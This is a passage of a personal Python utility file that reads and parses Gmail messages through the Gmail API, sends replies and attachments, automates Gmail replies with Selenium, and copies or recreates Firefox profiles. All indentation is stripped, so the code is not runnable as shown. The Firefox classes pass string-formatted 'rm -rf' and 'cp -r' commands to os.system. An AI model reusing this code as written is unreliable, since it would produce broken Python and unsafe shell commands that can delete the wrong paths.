try:
msg_data['sender'] = keyequals('name', 'Reply-To', header_data)[0]['value']
msg_data['sender'] = re.findall('<(.*?@.*?>)',msg_data['sender'])[0]
print("found a reply to")
except:
pass
msg_data['receiver'] = keyequals('name', 'To', header_data)[0]['value']
try:
msg_data['receiver'] = re.findall(r'<(.*)>', msg_data['receiver'])[0]
except:
pass
except:
try:
msg_data['receiver'] = keyequals('name', 'To', header_data)[0]['value']
except:
pass
emailer_name = or_list(lambda:findall(keyequals("name","From",header_data)[0]["value"],"(.*?) <.*?@.*?>")[0],lambda:findall(keyequals("name","From",header_data)[0]["value"],"^.*$")[0])
msg_data["emailer_name"] = emailer_name
try:
msg_data['subject'] = keyequals('name', 'Subject', header_data)[0]['value']
except:
print("header data")
print(header_data)
msg_data["subject"] = "No subject"
msg_data['date'] = or_list(lambda:keyequals('name', 'Received', header_data)[-1]['value'].split(';')[-1].strip(),lambda:keyequals("name","Date",header_data)[0]["value"])
if re.findall(r" \(.*?<.*?@.*?\.com.*?>.*?\)",msg_data["date"]):
msg_data["date"] = msg_data["date"].replace(re.findall(r" \(.*?<.*?@.*?\.com.*?>.*?\)",msg_data["date"])[0],"")
if re.findall(r"^from.*?HTTP.*?id .*? ",msg_data["date"]):
msg_data["date"] = msg_data["date"].replace(re.findall(r"^from.*?HTTP.*?id .*? ",msg_data["date"])[0],"")
msg_data["date"] = Date().parse_date(msg_data["date"],remove_tzinfo=True,localize_timezone=True)
try: msg_data['parts'] = initial_data['payload']['parts']
except: pass
pay = self.m.get(userId='me',id=msg['id'], format='raw').execute()
pay_2 = self.m.get(userId='me',id=msg['id'], format='full').execute()
import base64
message = base64.urlsafe_b64decode(pay['raw'].encode('ASCII')).decode("utf-8", "ignore")
message_2 = base64.urlsafe_b64decode(pay['raw'].encode('ASCII'))
message = message
msg_data["hidden_message"] = message
msg_data["hidden_message_2"] = message_2
msg_data["hidden_message_pay_raw"] = pay["raw"]
try:
msg_data["hidden_message_3"] = base64.urlsafe_b64decode(pay_2["payload"]["parts"][-1]["body"]["data"])
msg_data["hidden_message_3"] = (findall( msg_data["hidden_message_3"].encode(errors="ignore"),r"(?s)<.*>")[0]).encode() if msg_data["hidden_message_3"].encode(errors="ignore").startswith("<") else msg_data["hidden_message_3"]
except:
try:
msg_data["hidden_message_3"] = base64.urlsafe_b64decode(pay_2["payload"]["body"]["data"])
msg_data["hidden_message_3"] = (findall( msg_data["hidden_message_3"].encode(errors="ignore"),r"(?s)<.*>")[0]).encode() if msg_data["hidden_message_3"].encode(errors="ignore").startswith("<") else msg_data["hidden_message_3"]
except:
try:
msg_data["hidden_message_3"] = base64.urlsafe_b64decode(pay_2["payload"]["parts"][-1]["parts"][-1]["body"]["data"])
msg_data["hidden_message_3"] = (findall( msg_data["hidden_message_3"].encode(errors="ignore"),r"(?s)<.*>")[0]).encode() if msg_data["hidden_message_3"].encode(errors="ignore").startswith("<") else msg_data["hidden_message_3"]
except:
try:
rf=lmap(lambda i:base64.urlsafe_b64decode(i),findall(json.dumps(pay_2,indent=4),r'"data": ".*?"'))
rf=lmap(lambda i:i.decode(errors="ignore"), rf)
s=findall( ("\n\n\n".join(rf)).strip() , "(?s)<.*>" ) [ 0] if(tryprocess(lambda:findall( ("\n\n\n".join(rf)).strip() , "(?s)<.*>" ) [ 0])==1)else(("\n\n\n".join(rf)).strip())
s = s.encode()
#hidden_message_3 = SOUP(s).text
msg_data["hidden_message_3"] = s
except:
0/0
#if "Content-Type: text/plain" not in message:
# assert False
if "Content-Type: text/plain" in message:
content_types = re.findall(r"Content-Type:.*;", message)
scan_1 = re.findall(r"(?s)Content-Type: text/plain.*", message)[0]
content_types = re.findall(r"Content-Type:.*;", message)
scan_2 = None
if len(content_types) > 1:
try:scan_2 = re.findall(r"(?s)(Content-Type: text/plain.*)Content-Type", scan_1)[0]
except: scan_2 = scan_1
elif len(content_types) == 1:
scan_2 = scan_1
print("[tentative] re.sub urls. -- ")
scan_3 = re.sub(r"(?s)http.*? ","<url>", scan_2)
print("[morecleans] -- ")
scan_4 = re.sub(r"[\n]+", "\n", scan_3)
scan_5 = re.sub(r"(?s)Content-Type.*?\n","",scan_4)
scan_6 = re.sub(r"(?s)Content-Transfer-Encoding.*?\n","",scan_5)
scan_7 = re.sub(r"(?s)Mime-Version.*?\n","",scan_6)
scan_8 = re.sub(r"(?s)Date.*?\n","",scan_7)
scan_9 = re.sub(r"(?s)\n--.*","",scan_8)
scan_10 = scan_9.replace("\r", "\n")
#print(scan_4)
msg_str = ("Subject: %s\n"%msg_data["subject"]) + scan_10
#msg_str = msg_str.replace("=", "")
#msg_str = BeautifulSoup(msg_str, 'lxml').text
#msg_str = msg_str[msg_str.find('From: '):]
#for i in range(25):
# msg_str = msg_str.replace('\n\n','\n').replace('\r','').replace('\t','').replace(' ',' ').replace(' \n','').replace('\n ','\n')
msg_data['message'] = msg_str
def save_message_as_emit(l):
locals().update(l)
an_emit = Emit()
if len(Emit.objects.filter(true_id=msg_data["id"])) == 1:
emit = Emit.objects.get(true_id=msg_data["id"])
print("found emit with true id of %s existing.." % msg_data["id"])
an_emit.direction = msg_data["direction"]
point_a = None
point_b = None
print(json.dumps(msg_data, indent=4))
if an_emit.direction == 0:
point_a = msg_data["receiver"]
point_b = msg_data["sender"]
elif an_emit.direction == 1:
#print("direction is 1, receiver is point_b")
point_a = msg_data["sender"]
point_b = msg_data["receiver"]
moment = None
try: moment = Date().myDatetimenow( datetime.strptime( re.findall(r"(.*) [+-]", msg_data["date"])[0].split(".")[0], "%a, %d %b %Y %H:%M:%S" ) , round_count = 6) # """ Out[6]: datetime.datetime(2018, 7, 30, 0, 38, 55)->18210.027025|datetime.datetime(2018, 7, 30, 0, 38, 56)->18210.027037 """
except Exception as e: redprint("error in setting moment for Emit... %s"%e) ; print(msg_data['date'])
print("moment: %s," % moment)
true_id = msg_data["id"]
payload = msg_data["message"]
print("saving an emit\n")
#print(json.dumps(an_emit.__dict__, indent=4))
an_emit.__dict__.update(locals())
true_ids.add(an_emit.true_id)
try:
print("saving an emit..")
an_emit.save()
except Exception as e:
an_emit = Emit.objects.get(true_id=an_emit.true_id)
None
#save_message_as_emit(l=locals())
msg_data.pop('parts', None)
messages.append(msg_data)
self.sent_messages = [i for i in messages if i.get("receiver",None)!=None and "SENT" in i["labelIds"]]
self.messages = [i for i in messages if i.get("receiver",None)!=None and "SENT" not in i["labelIds"]]
# receiver will default to None if emailer sends email to emailer.(self).{test}
for i in self.messages:
i = AttrDict(i)
#except Exception as e: # ._. - " (?) "
# print(e) # /> - > . <
# print("\n\n\n\n\nWHY IS THERE AN ERROR?")
# print(json.dumps(msg_data, indent=4))
# input("take this out when checked. why there is an errors . unknown errors here in Emailer.")
# errors += 1
except Exception as e:
redprint(e)
messages_in_without.append(msg_data)
self.messages_in_without = messages_in_without
messages_in_without2.append(msg)
self.messages_in_without2 = messages_in_without2
if tryprocess(lambda: self.messages) == 0:
self.messages = []
redprint(messages_in_without)
self.errors = messages_in_without
self.messages = [AttrDict(i) for i in self.messages]
#distinct_print(ordered_json_dumps(messages_in_without))
redprint("\n\n")
redprint(messages_in_without)
#distinct_print(ordered_json_dumps(messages_in_without))
print("%s errors" % errors)
print("%s true ids" % len(true_ids))
blueprint("%s messages, (%s+%s), errors:(%s)"%(len(data),(len(self.messages)),len(self.sent_messages),len(self.errors)))
redprint("This now updates to latest existing msg['id']")
return self.messages
def create_tickets_from_message(self, i):
i['date'] = i['date'].replace(' +', ' -')
i['date'] = i['date'].split(' -')[0]
i['date'] = i['date'].split('.')[0]
try:
i['datetime'] = datetime.strptime(i['date'], "%a, %d %b %Y %H:%M:%S")
except:
i['datetime'] = datetime.strptime(i['date'], "%d %b %Y %H:%M:%S")
i['text'] = i['message']
try:
email_accounts_in_message = [i['receiver'], i['sender']]
i['email'] = [j for j in email_accounts_in_message if 'support@' not in j][0]
except:
return
print("creating... \n%s"%i)
def set_attachments(self, subject=''):
filtered_messages = keyequals('subject', subject, self.messages)
filtered_messages = [i for i in filtered_messages if 'UNREAD' in i['labelIds']]
for msg_data in filtered_messages:
msg_data['attachments'] = []
for part in msg_data['parts']:
if '.csv' in part['filename'] or '.txt' in part['filename']:
attachmentId = part['body']['attachmentId']
attachment = self.a.get(userId='me', messageId=msg_data['id'], id=attachmentId).execute()
msg_data['attachments'].append({'filename': part['filename'],
'data': attachment['data']})
self.remove_labels(id=msg_data['id'], labels=['UNREAD'])
def dump_attachments(self, outdir='./'):
for msg_data in self.messages:
if 'attachments' in msg_data:
for attachment in msg_data['attachments']:
print('writing... %s' % outdir+attachment['filename'])
with open(outdir+attachment['filename'], 'wb') as f:
import base64
f.write(base64.urlsafe_b64decode(attachment['data'].encode('UTF-8')))
try: return outdir+attachment['filename']
except: return None
def reply_to_message(self, thread_id, msg):
ss = Browser()("sele")
ss.get("https://gmail.com")
ss.fcns('gbii')[-1].click()
print("discovering the slot")
BASE_EMAIL_STRING = "https://mail.google.com/mail/u/0/#inbox"
if ss.fcns("gb_Cb")[-1].text != self.user:
slot = None
users = ss.fcns("gb_Zb")
for idx, user_slot in enumerate(users):
print(user_slot.text.strip().replace(" (default)", ""))
if self.user == user_slot.text.strip().replace(" (default)", ""):
slot = user_slot
self.slot_idx = idx
BASE_EMAIL_STRING = "https://mail.google.com/mail/u/%s/#inbox" % self.slot_idx
thread_url = BASE_EMAIL_STRING + '/' + thread_id
print("getting %s" % thread_url)
ss.get(thread_url)
print("clicking open the last response box")
ss.fcns('bkH')[-1].click()
print("typing msg in boxbox..")
ss.ffs("div","contenteditable","true").send_keys(msg)
print("sending message...")
ss.fcns("L3")[-2].click()
print("sleeping .")
time.sleep(7)
ss.quit()
def get_major_thread_from_one_thread(self, thread_id):
threads = self.get_all_threads()
for thread in threads:
tdata = self.service.users().threads().get(userId="me", id=thread['id']).execute()
for i in tdata['messages']:
if i['id'] == thread_id:
print('match', thread['id'] == thread_id, "if matched True, then the mini thread Id you replied to was the Major one. ^-^")
print("but this requires extensive in depth testing. would recommend doing 1 by 1.")
def get_all_threads(self):
idx = 0
data = []
nextpagetoken = None
while True:
if nextpagetoken is not None:
threads = self.service.users().threads().list(userId='me', pageToken=nextpagetoken).execute()
elif nextpagetoken is None:
threads = self.service.users().threads().list(userId='me').execute()
print("getting more messages... idx: %s" % idx)
data.extend(threads.pop('threads', []))
if 'nextPageToken' not in threads.keys():
break
else:
nextpagetoken = threads['nextPageToken']
idx += 1
return data
def send_reply(self, msgHtml, threadId, ):
payload = self.m.get(userId='me',id=threadId).execute().get("payload")
headers = payload.get("headers")
headers_dict = dict(zip(key("name", headers), key("value", headers)))
msgHtml = msgHtml.replace("\n", "<br>")
references = []
for i in headers:
if i["name"] in ["In-Reply-To", "References", "Message-ID"]:
references.extend(i["value"].split(" "))
redprint(references)
references = " ".join(references)
redprint(references)
subject = headers_dict["Subject"]
print(headers_dict["From"])
to = re.findall("[a-z0-9]*@.*?\.[a-z0-9]*", headers_dict["From"])[0]
from_ = self.user
threadId = threadId
print("references: %s" % references)
print("subject: %s" % subject)
print("to: %s" % to)
print("from_: %s" % from_)
print("threadId: %s" % threadId)
msg = MIMEMultipart('alternative')
msg['Subject'] = subject
msg["To"] = to
msg['From'] = from_
msg['threadId'] = threadId
msg.attach(MIMEText('msgPlain', 'plain'))
msg.attach(MIMEText(msgHtml, 'html'))
import base64
raw = base64.urlsafe_b64encode(msg.as_bytes())
raw = raw.decode()
message = {'raw': raw}
sent_message = self.m.send(userId="me", body=message).execute()
print("sent message id: %s" % sent_message.get('id', "error"))
self.modify_as_read(id = threadId)
def modify_as_read(self, id, star=True):
if(True==star):
self.m.modify(userId="me",id=id,body={"addLabelIds":["STARRED"],"removeLabelIds":["UNREAD"]}).execute()
elif(False==star):
self.m.modify(userId="me",id=id,body={"removeLabelIds":["UNREAD"]}).execute()
def send_message(self, subject, to, msgHtml, threadId=None):
from email.mime.multipart import MIMEMultipart
msg = MIMEMultipart('alternative')
msg['Subject'] = subject
msg['To'] = to
msg['From'] = self.user
msg.attach(MIMEText('msgPlain', 'plain'))
msg.attach(MIMEText(msgHtml, 'html'))
import base64
raw = base64.urlsafe_b64encode(msg.as_bytes())
raw = raw.decode()
message = {'raw': raw}
try:
sent_message = self.m.send(userId="me", body=message).execute()
print(sent_message['id'])
return sent_message
except Exception as e:
print(e)
return str(e)
def send_message_with_attachment(self, subject, to, message_text='', file=''):
""" ::: the fat frog 2 ::: """
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.audio import MIMEAudio
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import mimetypes
message = MIMEMultipart()
message['to'] = to
# message['from'] = self.user
message['subject'] = subject
msg = MIMEText(message_text)
message.attach(msg)
content_type, encoding = mimetypes.guess_type(file)
#if content_type.split("/")[0] == 'text':
# redprint("text")
# fp = open(file, 'rb')
# msg = MIMEText(fp.read(), _subtype=content_type.split("/")[1]) # [AttributeError: 'bytes' object has no attribute 'encode']
# fp.close()
# filename = os.path.basename(file)
# msg.add_header('Content-Disposition', 'attachment', filename=filename)
# message.attach(msg)
if content_type is None or encoding is not None:
content_type = 'application/octet-stream'
main_type, sub_type = content_type.split('/', 1)
if content_type == "application/pdf":
main_type, sub_type = content_type.split("/")
fp = open(file, 'rb')
msg = MIMEBase(main_type, sub_type)
msg.set_payload(fp.read())
fp.close()
filename = os.path.basename(file)
import email.encoders
msg.add_header('Content-Disposition', 'attachment', filename=filename)
email.encoders.encode_base64(msg)
message.attach(msg)
elif content_type.split("/")[0] == 'image':
redprint("image")
fp = open(file, 'rb')
msg = MIMEImage(fp.read(), _subtype=content_type.split("/")[1])
fp.close()
filename = os.path.basename(file)
msg.add_header('Content-Disposition', 'attachment', filename=filename)
message.attach(msg)
elif content_type.split("/")[0] == 'audio':
redprint("audio")
fp = open(file, 'rb')
msg = MIMEAudio(fp.read(), _subtype=content_type.split("/")[1])
fp.close()
filename = os.path.basename(file)
msg.add_header('Content-Disposition', 'attachment', filename=filename)
message.attach(msg)
else:
redprint("elsed")
fp = open(file, 'rb')
msg = MIMEBase(content_type.split("/")[0], content_type.split("/")[1])
msg.set_payload(fp.read())
fp.close()
filename = os.path.basename(file)
msg.add_header('Content-Disposition', 'attachment', filename=filename)
message.attach(msg)
import base64
created_message = {'raw': base64.urlsafe_b64encode(message.as_bytes()).decode()}
sent_message = self.m.send(userId='me', body=created_message).execute()
print(sent_message)
return sent_message
def failsafe_gmail_api_quickstart():
# below commented out
# from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/gmail.readonly']
def main():
"""Shows basic usage of the Gmail API.
Lists the user's Gmail labels.
"""
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('gmail', 'v1', credentials=creds)
# Call the Gmail API
results = service.users().labels().list(userId='me').execute()
labels = results.get('labels', [])
if not labels:
print('No labels found.')
else:
print('Labels:')
for label in labels:
print(label['name'])
if __name__ == '__main__':
main()
class Explain_It(object):
def explain_it(self):
simplest_reason = input("simplest reason")
most_complicated_reason = input("most complicated reason")
reasons = [simplest_reason,most_complicated_reason]
while True:
reasons.insert(1,input("reasons going from simplest to most complicated"))
print(reasons)
class Firefox_Porter:
def __init__(self, io = None):
if Exists(io):
rm(GLOBAL_FIREFOX_PROFILE_PATH)
os.makedirs(GLOBAL_FIREFOX_PROFILE_PATH, exist_ok = False)
lmap(lambda i: os.system("/Applications/Firefox\ 46.app/Contents/MacOS/firefox-bin -CreateProfile %s" % i), lmap(lambda i: i.split(".")[-1], os.listdir(io)))
lmap(lambda i: os.system("rm -rf %s"%(Join("/",address_backslash(GLOBAL_FIREFOX_PROFILE_PATH),i,"*"))), os.listdir(GLOBAL_FIREFOX_PROFILE_PATH))
lmap(lambda i: os.system("cp -r %s %s" % (Join("/", io, i, "*"),Join("/",address_backslash(GLOBAL_FIREFOX_PROFILE_PATH),[j for j in os.listdir(GLOBAL_FIREFOX_PROFILE_PATH) if j.split(".")[-1]==i.split(".")[-1]][0],""))), os.listdir(io))
else:
io = (lmap(lambda i: i.split(".")[-1], os.listdir(GLOBAL_FIREFOX_PROFILE_PATH)))if(io==None)else(io)
io = lmap(lambda i: [j for j in os.listdir(GLOBAL_FIREFOX_PROFILE_PATH) if j.split(".")[-1]==i][0], io)
os.makedirs("Firefox_Port", exist_ok = False)
lmap(lambda i: os.system("cp -r '%s' '%s'" % (Join("/",GLOBAL_FIREFOX_PROFILE_PATH,i),Join("/","Firefox_Port",i))), io)
zipUtil("Firefox_Port")
"""
Firefox_Porter(io = None) # Port Out
redprint("\n".join(os.listdir("Firefox_Port")))
Firefox_Porter("Firefox_Port") # Port In
Firefox_Porter(io = ["sele2", "main_panels", "emails", "default"]) # Port One
redprint("\n".join(os.listdir("Firefox_Port")))
Firefox_Porter("Firefox_Port") # Port In
"""
class Firefox_Profile:
def __init__(self, profile):
[rm(Join("/", GLOBAL_FIREFOX_PROFILE_PATH, i)) for i in os.listdir(GLOBAL_FIREFOX_PROFILE_PATH) if i.split(".")[-1] == profile]
os.system("/Applications/Firefox\ 46.app/Contents/MacOS/firefox-bin -CreateProfile %s" % (profile))
R = [i for i in os.listdir(GLOBAL_FIREFOX_PROFILE_PATH) if i.split(".")[-1] == profile][0]
# open(Join("/", GLOBAL_FIREFOX_PROFILE_PATH, R, "prefs.js"), "w").write('// Mozilla User Preferences\n\n// DO NOT EDIT THIS FILE.\n//\n// If you make changes to this file while the application is running,\n// the changes will be overwritten when the application exits.\n//\n// To change a preference value, you can either:\n// - modify it via the UI (e.g. via about:config in the browser); or\n// - set it within a user.js file in your profile.\n\nuser_pref("app.normandy.first_run", false);\nuser_pref("app.normandy.user_id", "06ce59be-456c-b540-9a47-0941c6043180");\nuser_pref("app.update.auto", false);\nuser_pref("app.update.enabled", false);\nuser_pref("app.update.lastUpdateTime.addon-background-update-timer", 0);\nuser_pref("app.update.lastUpdateTime.background-update-timer", 1550635354);\nuser_pref("app.update.lastUpdateTime.blocklist-background-update-timer", 0);\nuser_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1550633597);\nuser_pref("app.update.lastUpdateTime.recipe-client-addon-run", 0);\nuser_pref("app.update.lastUpdateTime.search-engine-update-timer", 1550635039);\nuser_pref("app.update.lastUpdateTime.services-settings-poll-changes", 1550635420);\nuser_pref("app.update.lastUpdateTime.telemetry_modules_ping", 0);\nuser_pref("app.update.lastUpdateTime.xpi-signature-verification", 0);\nuser_pref("browser.bookmarks.restore_default_bookmarks", false);\nuser_pref("browser.cache.disk.capacity", 1048576);\nuser_pref("browser.cache.disk.filesystem_reported", 1);\nuser_pref("browser.cache.disk.smart_size.first_run", false);\nuser_pref("browser.cache.disk.smart_size.use_old_max", false);\nuser_pref("browser.cache.frecency_experiment", 1);\nuser_pref("browser.contentblocking.category", "standard");\nuser_pref("browser.download.importedFromSqlite", true);\nuser_pref("browser.laterrun.bookkeeping.profileCreationTime", 1550633567);\nuser_pref("browser.laterrun.bookkeeping.sessionCount", 12);\nuser_pref("browser.laterrun.enabled", true);\nuser_pref("browser.migrated-sync-button", true);\nuser_pref("browser.migration.version", 77);\nuser_pref("browser.newtabpage.activity-stream.feeds.section.highlights", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.section.topstories", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.section.topstories.rec.impressions", "{"34054":1550633569243,"34079":1550633569243,"34084":1550633569243}");\nuser_pref("browser.newtabpage.activity-stream.feeds.section.topstories.spoc.impressions", "{"787":[1550634723461,1550634727923,1550634732355],"1099":[1550635011420]}");\nuser_pref("browser.newtabpage.activity-stream.feeds.snippets", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.topsites", false);\nuser_pref("browser.newtabpage.activity-stream.impressionId", "{c85341b3-f663-9243-bac9-83b8e7427423}");\nuser_pref("browser.newtabpage.activity-stream.migrationLastShownDate", 1550552400);\nuser_pref("browser.newtabpage.activity-stream.migrationRemainingDays", 3);\nuser_pref("browser.newtabpage.activity-stream.prerender", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeBookmarks", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeDownloads", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includePocket", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeVisited", false);\nuser_pref("browser.newtabpage.activity-stream.showSearch", false);\nuser_pref("browser.newtabpage.activity-stream.showSponsored", false);\nuser_pref("browser.newtabpage.enhanced", true);\nuser_pref("browser.newtabpage.storageVersion", 1);\nuser_pref("browser.pageActions.persistedActions", "{"version":1,"ids":["bookmark","bookmarkSeparator","copyURL","emailLink","addSearchEngine","sendToDevice","shareURL","pocket","screenshots_mozilla_org"],"idsInUrlbar":["pocket","bookmark"]}");\nuser_pref("browser.pagethumbnails.storage_version", 3);\nuser_pref("browser.places.smartBookmarksVersion", 7);\nuser_pref("browser.preferences.advanced.selectedTabIndex", 0);\nuser_pref("browser.rights.3.shown", true);\nuser_pref("browser.safebrowsing.provider.google4.lastupdatetime", "1550635400587");\nuser_pref("browser.safebrowsing.provider.google4.nextupdatetime", "1550637198587");\nuser_pref("browser.safebrowsing.provider.mozilla.lastupdatetime", "1550633571752");\nuser_pref("browser.safebrowsing.provider.mozilla.nextupdatetime", "1550637171752");\nuser_pref("browser.search.cohort", "nov17-2");\nuser_pref("browser.search.countryCode", "US");\nuser_pref("browser.search.region", "US");\nuser_pref("browser.sessionstore.upgradeBackup.latestBuildID", "20190211233335");\nuser_pref("browser.shell.checkDefaultBrowser", false);\nuser_pref("browser.shell.didSkipDefaultBrowserCheckOnFirstRun", true);\nuser_pref("browser.slowStartup.averageTime", 855);\nuser_pref("browser.slowStartup.samples", 1);\nuser_pref("browser.startup.homepage_override.buildID", "20190211233335");\nuser_pref("browser.startup.homepage_override.mstone", "65.0.1");\nuser_pref("browser.uiCustomization.state", "{"placements":{"widget-overflow-fixed-list":[],"nav-bar":["back-button","forward-button","stop-reload-button","home-button","customizableui-special-spring1","urlbar-container","customizableui-special-spring2","downloads-button","library-button","sidebar-button","loop-button"],"TabsToolbar":["tabbrowser-tabs","new-tab-button","alltabs-button"],"PersonalToolbar":["personal-bookmarks"]},"seen":["developer-button","loop-button","pocket-button","feed-button"],"dirtyAreaCache":["nav-bar","TabsToolbar","PersonalToolbar"],"currentVersion":15,"newElementCount":2}");\nuser_pref("browser.urlbar.placeholderName", "Google");\nuser_pref("browser.urlbar.timesBeforeHidingSuggestionsHint", 2);\nuser_pref("datareporting.healthreport.uploadEnabled", false);\nuser_pref("datareporting.policy.dataSubmissionPolicyAcceptedVersion", 2);\nuser_pref("datareporting.policy.dataSubmissionPolicyNotifiedTime", "1550633570624");\nuser_pref("datareporting.sessions.current.activeTicks", 7);\nuser_pref("datareporting.sessions.current.clean", true);\nuser_pref("datareporting.sessions.current.firstPaint", 664);\nuser_pref("datareporting.sessions.current.main", 73);\nuser_pref("datareporting.sessions.current.sessionRestored", 2511);\nuser_pref("datareporting.sessions.current.startTime", "1550633939369");\nuser_pref("datareporting.sessions.current.totalTime", 37);\nuser_pref("devtools.onboarding.telemetry.logged", true);\nuser_pref("distribution.iniFile.exists.appversion", "65.0.1");\nuser_pref("distribution.iniFile.exists.value", false);\nuser_pref("dom.apps.reset-permissions", true);\nuser_pref("dom.forms.autocomplete.formautofill", true);\nuser_pref("dom.mozApps.used", true);\nuser_pref("e10s.rollout.cohort", "unsupportedChannel");\nuser_pref("experiments.activeExperiment", false);\nuser_pref("extensions.blocklist.pingCountVersion", -1);\nuser_pref("extensions.bootstrappedAddons", "{"firefox@getpocket.com":{"version":"1.0","type":"extension","descriptor":"/Applications/Firefox.app/Contents/Resources/browser/features/firefox@getpocket.com.xpi","multiprocessCompatible":false,"runInSafeMode":true},"loop@mozilla.org":{"version":"1.2.6","type":"extension","descriptor":"/Applications/Firefox.app/Contents/Resources/browser/features/loop@mozilla.org.xpi","multiprocessCompatible":false,"runInSafeMode":true},"e10srollout@mozilla.org":{"version":"1.0","type":"extension","descriptor":"/Applications/Firefox.app/Contents/Resources/browser/features/e10srollout@mozilla.org.xpi","multiprocessCompatible":false,"runInSafeMode":true}}");\nuser_pref("extensions.databaseSchema", 28);\nuser_pref("extensions.e10sBlockedByAddons", false);\nuser_pref("extensions.enabledAddons", "%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:46.0");\nuser_pref("extensions.getAddons.cache.lastUpdate", 1550633941);\nuser_pref("extensions.getAddons.databaseSchema", 5);\nuser_pref("extensions.lastAppBuildId", "20190211233335");\nuser_pref("extensions.lastAppVersion", "65.0.1");\nuser_pref("extensions.lastPlatformVersion", "65.0.1");\nuser_pref("extensions.pendingOperations", false);\nuser_pref("extensions.systemAddonSet", "{"schema":1,"addons":{}}");\nuser_pref("extensions.webcompat.perform_injections", true);\nuser_pref("extensions.webcompat.perform_ua_overrides", true);\nuser_pref("extensions.webextensions.uuids", "{"formautofill@mozilla.org":"2b4f0ede-b4d9-6545-9ac0-e1660f03296f","screenshots@mozilla.org":"a1a637bf-7c5f-f446-908f-d12e4f77d811","webcompat-reporter@mozilla.org":"9bf34646-9ad4-954f-9c4e-1063d8c70d25","webcompat@mozilla.org":"b79d04e0-3f7f-3b44-a76a-3cdbecb89a81"}");\nuser_pref("extensions.xpiState", "{"app-system-defaults":{"firefox@getpocket.com":{"d":"/Applications/Firefox.app/Contents/Resources/browser/features/firefox@getpocket.com.xpi","e":true,"v":"1.0","st":1540071218000},"loop@mozilla.org":{"d":"/Applications/Firefox.app/Contents/Resources/browser/features/loop@mozilla.org.xpi","e":true,"v":"1.2.6","st":1540071218000},"e10srollout@mozilla.org":{"d":"/Applications/Firefox.app/Contents/Resources/browser/features/e10srollout@mozilla.org.xpi","e":true,"v":"1.0","st":1540071218000}},"app-global":{"{972ce4c6-7e08-4474-a285-3208198ce6fd}":{"d":"/Applications/Firefox.app/Contents/Resources/browser/extensions/{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi","e":true,"v":"46.0","st":1540071218000}}}");\nuser_pref("font.internaluseonly.changed", true);\nuser_pref("gecko.buildID", "20160421124000");\nuser_pref("gecko.mstone", "46.0");\nuser_pref("lightweightThemes.persisted.headerURL", false);\nuser_pref("lightweightThemes.usedThemes", "[]");\nuser_pref("media.gmp.storage.version.observed", 1);\nuser_pref("network.cookie.prefsMigrated", true);\nuser_pref("network.predictor.cleaned-up", true);\nuser_pref("pdfjs.enabledCache.state", false);\nuser_pref("pdfjs.migrationVersion", 2);\nuser_pref("pdfjs.previousHandler.alwaysAskBeforeHandling", true);\nuser_pref("pdfjs.previousHandler.preferredAction", 4);\nuser_pref("places.history.expiration.transient_current_max_pages", 112348);\nuser_pref("plugin.disable_full_page_plugin_for_types", "application/pdf");\nuser_pref("privacy.cpd.offlineApps", true);\nuser_pref("privacy.cpd.siteSettings", true);\nuser_pref("privacy.sanitize.migrateClearSavedPwdsOnExit", true);\nuser_pref("privacy.sanitize.pending", "[{"id":"newtab-container","itemsToClear":[],"options":{}}]");\nuser_pref("privacy.sanitize.timeSpan", 0);\nuser_pref("security.sandbox.content.tempDirSuffix", "d0b0a17d-ddae-9c44-bb41-7cfca103ccd5");\nuser_pref("security.sandbox.plugin.tempDirSuffix", "9ad5aae9-5dc2-ac4f-9263-0195647a6ab7");\nuser_pref("services.blocklist.addons.checked", 1550635565);\nuser_pref("services.blocklist.onecrl.checked", 1550635565);\nuser_pref("services.blocklist.plugins.checked", 1550635565);\nuser_pref("services.settings.clock_skew_seconds", -145);\nuser_pref("services.settings.last_update_seconds", 1550635565);\nuser_pref("services.settings.main.language-dictionaries.last_check", 1550635565);\nuser_pref("services.settings.main.onboarding.last_check", 1550635565);\nuser_pref("services.settings.main.sites-classification.last_check", 1550635565);\nuser_pref("services.sync.clients.lastSync", "0");\nuser_pref("services.sync.clients.lastSyncLocal", "0");\nuser_pref("services.sync.declinedEngines", "");\nuser_pref("services.sync.engine.addresses.available", true);\nuser_pref("services.sync.globalScore", 0);\nuser_pref("services.sync.migrated", true);\nuser_pref("services.sync.nextSync", 0);\nuser_pref("services.sync.tabs.lastSync", "0");\nuser_pref("services.sync.tabs.lastSyncLocal", "0");\nuser_pref("signon.importedFromSqlite", true);\nuser_pref("toolkit.startup.last_success", 1550635390);\nuser_pref("toolkit.telemetry.cachedClientID", "c0ffeec0-ffee-c0ff-eec0-ffeec0ffeec0");\nuser_pref("toolkit.telemetry.previousBuildID", "20190211233335");\nuser_pref("toolkit.telemetry.reportingpolicy.firstRun", false);\n')
